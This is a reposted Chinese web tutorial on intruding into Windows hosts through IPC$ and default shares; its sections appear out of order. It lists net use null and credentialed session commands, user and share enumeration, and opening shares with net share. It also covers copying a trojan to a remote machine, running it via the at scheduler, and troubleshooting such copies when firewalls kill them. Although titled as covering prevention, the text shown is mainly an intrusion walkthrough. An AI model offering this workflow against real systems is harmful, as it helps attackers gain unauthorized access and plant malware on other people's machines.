共享入侵与防范
来源:网络 作者:佚名
1)错误的认为能建立ipc$连接的主机就一定开启了默认共享,因而在建立完连接之后马上向admin$之类的默认共享复制文件,导致复制失败。ipc$连接成功只能说明对方打开了ipc$共享,ipc$共享与默认共享是两码事,ipc$共享是一个命名管道,并不是哪个实际的文件夹,而默认共享并不是ipc$共享的必要条件;
2)由于net view \\IP 无法显示默认共享(因为默认共享带$),因此通过这个命令,我们并不能判断对方是否开启了默认共享,因此如果对方未开启默认共享,那么所有向默认共享进行的操作都不能成功;(不过大部分扫描软件在扫弱口令的同时,都能扫到默认共享目录,可以避免此类错误的发生)
还需要说明一点:不要认为administrator就一定是管理员,管理员名称是可以改的。
十 一些需要shell才能完成的命令 1 向远程主机建立用户,激活用户,修改用户密码,加入管理组的操作需要在shell下完成;
2 打开远程主机的ipc$共享,默认共享,普通共享的操作需要在shell下完成;
3 运行/关闭远程主机的服务,需要在shell下完成;
4 启动/杀掉远程主机的进程,也需要在shell下完成。
1 建立空连接: 2 建立非空连接: 3 查看远程主机的共享资源(但看不到默认共享) 4 查看本地主机的共享资源(可以看到本地的默认共享) 5 得到远程主机的用户名列表 6 得到本地主机的用户列表 7 查看远程主机的当前时间 8 显示本地主机当前服务 9 启动/关闭本地服务 10 映射远程共享: 11 删除共享映射 12 向远程主机复制文件 13 远程添加计划任务
2 默认共享判断错误
这类错误也是大家经常犯的,主要有两个小方面:
3用户权限不够,包括四种情形:
1)空连接向所有共享(默认共享和普通共享)复制时,大多情况下权限是不够的;
2)向默认共享复制时,要具有管理员权限;
3)向普通共享复制时,要具有相应权限(即对方事先设定的访问权限);
4)对方可以通过防火墙或安全软件的设置,禁止外部访问共享;
4被防火墙杀死或在局域网
也许你的复制操作已经成功,但当远程运行时,被防火墙杀掉了,导致找不到文件;还有可能你把木马复制到了局域网内的主机,导致连接失败。因此建议你复制时要小心,否则就前功尽弃了。
呵呵,大家也知道,ipc$连接在实际操作过程中会出现千奇百怪的问题,上面我所总结的只是一些常见错误,没说到的,只能让大家自己去体会了。
九 如何打开目标的IPC$共享以及其他共享
目标的ipc$不是轻易就能打开的,否则就要天下打乱了。你需要一个admin权限的shell,比如telnet,木马等,然后在shell下执行net share ipc$来开放目标的ipc$,用net share ipc$ /del来关闭共享。如果你要给它开共享文件夹,你可以用net share baby=c:\,这样就把它的c盘开为共享名为baby共享了。
看到很多教程这方面写的十分不准确,一些需要shell才能完成命令就简简单单的在ipc$连接下执行了,起了误导作用。那么下面我总结一下需要在shell才能完成的命令:
十一 入侵中可能会用到的相关命令
请注意命令适用于本地还是远程,如果适用于本地,你只能在获得远程主机的shell后,才能向远程主机执行。
net use \\IP\ipc$ "" /user:""
net use \\IP\ipc$ "psw" /user:"account"
net view \\IP
net share
nbtstat -A IP
net user
net time \\IP
net start
net start 服务名 /y
net stop 服务名 /y
net use z: \\IP\baby
此命令将共享名为baby的共享资源映射到z盘
net use c: /del 删除映射的c盘,其他盘类推
net use * /del /y删除全部
copy \路径\srv.exe \\IP\共享目录名,如:
copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内
at \\ip 时间 程序名,如:
·上一篇文章:俄罗斯的黑客文化:技术高、口碑好
·下一篇文章:WIN2000的安全设置
转载请注明转载网址:
http://www.jmkt.cn/html/netaq/202242972.htm
相关内容